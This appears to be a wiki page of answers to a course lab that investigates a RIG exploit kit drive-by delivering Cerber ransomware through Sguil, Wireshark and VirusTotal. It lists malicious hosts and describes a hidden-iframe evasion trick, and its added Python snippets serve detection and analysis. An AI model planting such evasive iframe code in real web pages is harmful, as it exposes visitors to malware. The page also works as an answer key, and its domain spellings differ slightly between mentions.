27.2.15 Lab Investigate a Malware Exploit - PanamaP/KEST3CO05DU GitHub Wiki

Look at the expanded alert details and answer the following questions: Questions: What is the time of the first detected NIDS alert in Kibana?

Jan 27 2017, 22:54:43.000

What is the source IP address in the alert?

172.16.4.193:49202

What is the destination IP address in the alert?

194.87.234.129:80

What is the destination port in the alert? What service is this?

80, http.

What is the classification of the alert?

trojan-activity

What is the destination geo country name?

Russia

What is the malware family for this event?

Exploit_Kit_RIG

What is the severity of the exploit?

Major

What is an Exploit Kit? (EK) Search on the internet to answer this question

An exploit kit is a toolkit that cybercriminals use to attack vulnerabilities in systems so they can distribute malware or perform other malicious activities.

What website did the user intend to connect to?

www.homeimprovement.com

What URL did the browser refer the user to?

tyu.benme.com

What kind of content is requested by the source host from tyu.benme.com? Why could this be a problem?

A gzip file; it is most likely a virus.

Scroll down to the HTTP - Sites section of the dashboard. Question: What are some of the websites that are listed?

www.homeimprovement.com retrotip.visionurbana.com.ve tyu.benme.com spotsbill.com fpdownload2.macromedia.com api.blockcypher.com

Which of these sites is likely part of the exploit campaign?

www.homeimprovement.com retrotip.visionurbana.com.ve tyu.benme.com spotsbill.com

What are the HTTP - MIME Types listed in the Tag Cloud?

text/plain, text/html, application/javascript, text/json, image/png, image/x-icon, application/x-shockwave-flash, application/vnd.ms-fontobject

Locate the group of alerts from January 27th 2017. Question: According to Sguil, what are the timestamps for the first and last of the alerts that occurred within about a second of each other?

22:54:42 - 22:55:28

Select the alert ID 5.2 (Event message ET CURRENT Evil Redirector Leading to EK Jul 12 2016). Question: According to the IDS signature rule which malware family triggered this alert? You may need to scroll through the alert signature to find this entry.

PseudoDarkLeech

Maximize the Sguil window and size the Event Message column so that you can see the text of the entire message. Look at the Event Messages for each of the alert IDs related to this attack. Questions: According to the Event Messages in Sguil what exploit kit (EK) is involved in this attack?

RIG EK

Beyond labelling the attack as trojan activity, what other information is provided regarding the type and name of the malware involved?

Ransomware/Cerber

By your best estimate looking at the alerts so far, what is the basic vector of this attack? How did the attack take place?

Someone connected to a website.

What are the referer and host websites that are involved in the first SRC event? What do you think the user did to generate this alert?

The user used bing.com to search for "home improvement remodeling your kitchen" and then clicked on the infected www.homeimprovement.com page.

Refer to the transcript and answer the following questions: Questions: What kind of request was involved?

GET HTTP/1.1

Were any files requested?

dle_js.js

What is the URL for the referer and the host website?

referer - www.homeimprovement.com/remodeling-your-kitchen-cabinets.html host - retrotip.visionurbana.com.ve

How was the content encoded?

gzip

Close the current transcript window. In the Sguil window, right-click the alert ID 5.25 (Event Message ET CURRENT_EVENTS Rig EK URI Struct Mar 13 2017 M2) and open the transcript. According to the information in the transcript answer the following questions:

How many requests and responses were involved in this alert?

3 requests and 3 responses.

What was the first request?

GET HTTP/1.1

Who was the referrer?

www.homeimprovement.com/remodeling-your-kitchen-cabinets.html

Which host server was the request made to?

tyu.benme.com

Was the response encoded?

Yes, gzip

What was the second request?

POST, HTTP/1.1

Which host server was the request made to?

tyu.benme.com

Was the response encoded?

Yes, gzip

What was the third request?

GET HTTP/1.1

Who was the referrer?

tyu.benme.com

What was the Content-Type of the third response?

application/x-shockwave-flash

What were the first 3 characters of the data in the response? The data starts after the last DST: entry

CWS

CWS is a file signature. File signatures help identify the type of file that a block of data represents. Go to the following website https://en.wikipedia.org/wiki/List_of_file_signatures. Use Ctrl-F to open a find box. Search for this file signature to find out what type of file was downloaded in the data. Question: What type of file was downloaded? What application uses this type of file?

A Flash .swf file; Adobe Flash uses it.

Right-click the same ID again and choose Network Miner. Click the Files tab. Question: How many files are there and what are the file types?

3; html and swf

Select the first packet. In the packet details area, expand the Hypertext Transfer Protocol application layer data. Question: What website directed the user to the www.homeimprovement.com website?

Bing.com

Close Wireshark. In Sguil, right-click the alert ID 5.24 (source IP address 139.59.160.143 and Event Message ET CURRENT_EVENTS Evil Redirector Leading to EK March 15 2017) and choose Wireshark to pivot to Wireshark. Apply an http.request display filter and answer the following questions:

What is the http request for?

GET dle_js.js

What is the host server?

retrotip.visionurbana.com.ve

Investigate the Detection and Details tabs. Review the information that is provided on this hash value. Question: What did VirusTotal tell you about this file?

That 32 of 59 antivirus engines considered it a virus. It is a RIG EK exploit for Adobe Flash.

Close the browser and Wireshark. In Sguil, use alert ID 5.37 (Event Message ET CURRENT_EVENTS RIG EK Landing Sep 12 2016 T2) to pivot to Wireshark and examine the HTTP requests. Questions: Are there any similarities to the earlier alerts?

Same infected page and same host.

Are the files similar? Do you see any differences?

Same setup, two html and one swf; it just has a different name.

Create a SHA-1 hash of the SWF file as you did previously. Question: Is this the same malware that was downloaded in the previous HTTP session?

Yes, same hash.
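An added example (not part of the lab or the wiki author's work) that does in code what the CWS signature lookup and the SHA-1 step above do by hand: it recognises the SWF signature, reads the version and declared length from the 8-byte header, inflates a CWS body to check that the declared length is honest, and hashes the whole file. The sample bytes are constructed; the real .swf from the capture is not on the page.

```python
import hashlib
import struct
import zlib

# SWF magic bytes: FWS = uncompressed, CWS = zlib-compressed body, ZWS = LZMA body.
SWF_MAGIC = {b"FWS": "uncompressed", b"CWS": "zlib", b"ZWS": "lzma"}


def parse_swf_header(data: bytes) -> dict:
    """Identify an SWF by its signature, read version and declared file length,
    hash the whole file with SHA-1, and for CWS/FWS check that the declared
    length matches the real (inflated) size; a mismatch deserves a closer look."""
    if len(data) < 8 or data[:3] not in SWF_MAGIC:
        raise ValueError("not an SWF file (expected FWS/CWS/ZWS header)")
    sig = data[:3]
    info = {
        "signature": sig.decode("ascii"),
        "compression": SWF_MAGIC[sig],
        "version": data[3],
        "declared_length": struct.unpack("<I", data[4:8])[0],
        "sha1": hashlib.sha1(data).hexdigest(),
    }
    if sig == b"CWS":
        # The 8-byte header is stored uncompressed; only the body is deflated.
        body = zlib.decompress(data[8:])
        info["actual_length"] = 8 + len(body)
    elif sig == b"FWS":
        info["actual_length"] = len(data)
    else:
        info["actual_length"] = None  # LZMA (ZWS) is not unpacked here
    info["length_matches"] = info["actual_length"] == info["declared_length"]
    return info


def build_cws(body: bytes, version: int = 10) -> bytes:
    """Constructed test helper: wrap a raw SWF body in a CWS header."""
    return b"CWS" + bytes([version]) + struct.pack("<I", 8 + len(body)) + zlib.compress(body)


# Constructed stand-in for the downloaded .swf (17 body bytes, so declared length 25).
SAMPLE_SWF = build_cws(b"\x78\x00\x05\x5f\x00\x00\x0f\xa0\x00\x00\x0c\x01\x00\x40\x00\x00\x00")

if __name__ == "__main__":
    for key, value in parse_swf_header(SAMPLE_SWF).items():
        print(f"{key}: {value}")
```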

In Sguil, the last 4 alerts in this series are related, and they also seem to be post-infection. Questions: Why do they seem to be post-infection?

The virus host is being contacted.

What is interesting about the first alert in the last 4 alerts in the series?

It sends messages over UDP to the virus server, which is in France.

What type of communication is taking place in the second and third alerts in the series and what makes it suspicious?

It is sending DNS packets for p27dokhpz2n7nvgr.1jw2lx.top

Go to virustotal.com and do a URL search for the .top domain used in the attack. Question: What is the result?

4/71 antivirus engines report that this is a malicious domain.

Examine the last alert in the series in Wireshark. If it has any objects worth saving, export and save them to your home folder. Question: What are the filenames if any?

EE7E-AD39-7D8C-080C-18BF?iframe....

In Security Onion, open the remodeling-your-kitchen-cabinets.html file using your choice of text editor. This webpage initiated the attack. Question: Can you find the two places in the webpage that are part of the drive-by attack that started the exploit?

dle_js.js is loaded in the head, and in the body an iframe pointing at tyu.benme.com is loaded.

What does the file do?

A document.write that creates an iframe which takes the user to tyu.benme.com.

How does the code in the javascript file attempt to avoid detection?

By splitting the closing tag: "</ifr' + 'ame>"
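An added example (written for this page, not the lab's or the author's code) that shows why the split closing tag defeats a plain string match and how a detector gets around it: adjacent string literals are folded back together before the script is searched for document.write'd iframes, and the report notes when "</iframe>" only exists after folding. The sample script is constructed from the page's description of dle_js.js, not the real file.

```python
import re

# Constructed sample modelled on the page's description of dle_js.js: a
# document.write() that builds a hidden iframe and splits the closing tag
# across two string literals so a plain search for "</iframe>" never matches.
SAMPLE_JS = (
    "document.write('<iframe src=\"http://tyu.benme.com/\" width=\"1\" "
    "height=\"1\" style=\"visibility:hidden\"></ifr' + 'ame>');"
)

# Two adjacent string literals (no escapes inside) joined with '+'.
CONCAT = re.compile(r"""(?:'([^'\\]*)'|"([^"\\]*)")\s*\+\s*(?:'([^'\\]*)'|"([^"\\]*)")""")
IFRAME = re.compile(r"<iframe\b([^>]*)>", re.I)
SRC = re.compile(r"""\bsrc\s*=\s*['"]?([^'" >]+)""", re.I)
HIDDEN = re.compile(r"""visibility\s*:\s*hidden|display\s*:\s*none|\b(?:width|height)\s*=\s*['"]?[01]['"]?""", re.I)


def _fold(m):
    joined = (m.group(1) or m.group(2) or "") + (m.group(3) or m.group(4) or "")
    quote = "'" if "'" not in joined else '"'
    return quote + joined.replace(quote, "\\" + quote) + quote


def join_literals(src: str) -> str:
    """Fold 'a' + 'b' into 'ab' until nothing changes, so split tags reappear."""
    prev = None
    while prev != src:
        prev, src = src, CONCAT.sub(_fold, src)
    return src


def analyze_js(src: str) -> dict:
    """Report iframes written from script, whether they are hidden or tiny, and
    whether the closing tag only appears once literals are joined (the evasion)."""
    folded = join_literals(src)
    iframes = []
    for m in IFRAME.finditer(folded):
        attrs = m.group(1)
        s = SRC.search(attrs)
        iframes.append({"src": s.group(1) if s else None, "hidden": bool(HIDDEN.search(attrs))})
    return {
        "uses_document_write": bool(re.search(r"document\.write\s*\(", src)),
        "split_closing_tag": "</iframe>" not in src.lower() and "</iframe>" in folded.lower(),
        "iframes": iframes,
    }
```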

In a text editor, open the text/html file that was saved to your home folder with Vivaldi as part of the filename. Examine the file and answer the following questions: Questions: What kind of file is it?

html

What are some interesting things about the iframe? Does it call anything?

It is hidden but calls the start() function.

What does the start() function do?

It finds out which browser the user is using via the getBrowser() function, then creates a form that sends NormalURL (tyu.benme.com) in a POST.

What do you think the purpose of the getBrowser() function is?

To find out which browser the user is using.

The EK used a number of websites. Complete the table below.

| URL | IP Address | Function |
|---|---|---|
| www.bing.com | N/A | search engine; links to the legitimate webpage |
| www.homeimprovement.com | 104.28.18.74 | iframe that takes you to a malicious website |
| retrotip.visionurbana.com.ve | 139.59.160.143 | starts the malicious JavaScript file |
| tyu.benme.com | 194.87.234.129 | sends the malicious Adobe Flash file (swf) |
| n/a | 90.2.10.0 | contacts the Cerber ransomware server |
| p27dokhpz2n7nvgr.1jjw2lx.top | 198.105.151.50 | the Cerber ransomware site |

It is useful to “tell the story” of an exploit to understand what happened and how it works. Start with the user searching the internet with Bing. Search the web for more information on the RIG EK to help.

A user wants to make some changes at home, goes to Bing and searches for "home improvements remodeling", and then clicks on a website. A JavaScript file loads and fetches a malicious Adobe Flash file. The Flash file opens and downloads the Cerber virus, which then communicates with the Cerber server.
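An added example (not from the lab or the wiki author) of "telling the story" from the HTTP data rather than by hand: it rebuilds the referer chain Bing -> landing page -> redirector -> EK host from a request log and separates hosts the compromised page pulled in from hosts with no referer path back to it. The request records are constructed from the hosts and referer seen in the lab; URIs other than the landing page and dle_js.js are placeholders.

```python
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed request log modelled on the hosts and referers the lab surfaced
# (URIs other than the landing page and dle_js.js are placeholders).
REQUESTS = [
    {"host": "www.homeimprovement.com", "uri": "/remodeling-your-kitchen-cabinets.html",
     "referer": "https://www.bing.com/search?q=home+improvement+remodeling+your+kitchen"},
    {"host": "retrotip.visionurbana.com.ve", "uri": "/dle_js.js",
     "referer": "http://www.homeimprovement.com/remodeling-your-kitchen-cabinets.html"},
    {"host": "tyu.benme.com", "uri": "/",
     "referer": "http://www.homeimprovement.com/remodeling-your-kitchen-cabinets.html"},
    {"host": "tyu.benme.com", "uri": "/", "referer": "http://tyu.benme.com/"},
    {"host": "fpdownload2.macromedia.com", "uri": "/", "referer": ""},
]


def referer_graph(requests):
    """Edge host_a -> host_b for every request to host_b whose Referer was on host_a."""
    edges = defaultdict(set)
    for r in requests:
        ref_host = urlsplit(r["referer"]).hostname if r["referer"] else None
        if ref_host and ref_host != r["host"]:  # self-referrals add no new hop
            edges[ref_host].add(r["host"])
    return edges


def redirect_chain(requests, start):
    """Hosts reachable from `start` by following Referer edges, breadth-first."""
    edges = referer_graph(requests)
    seen, order, queue = set(), [], [start]
    while queue:
        host = queue.pop(0)
        if host in seen:
            continue
        seen.add(host)
        order.append(host)
        queue.extend(sorted(edges.get(host, ())))
    return order


def campaign_candidates(requests, landing):
    """Third-party hosts the compromised landing page pulled in; a host with no
    Referer path back to it (such as a Flash update check) is left out."""
    return [h for h in redirect_chain(requests, landing) if h != landing]


if __name__ == "__main__":
    print(" -> ".join(redirect_chain(REQUESTS, "www.bing.com")))
    print("campaign candidates:", campaign_candidates(REQUESTS, "www.homeimprovement.com"))
```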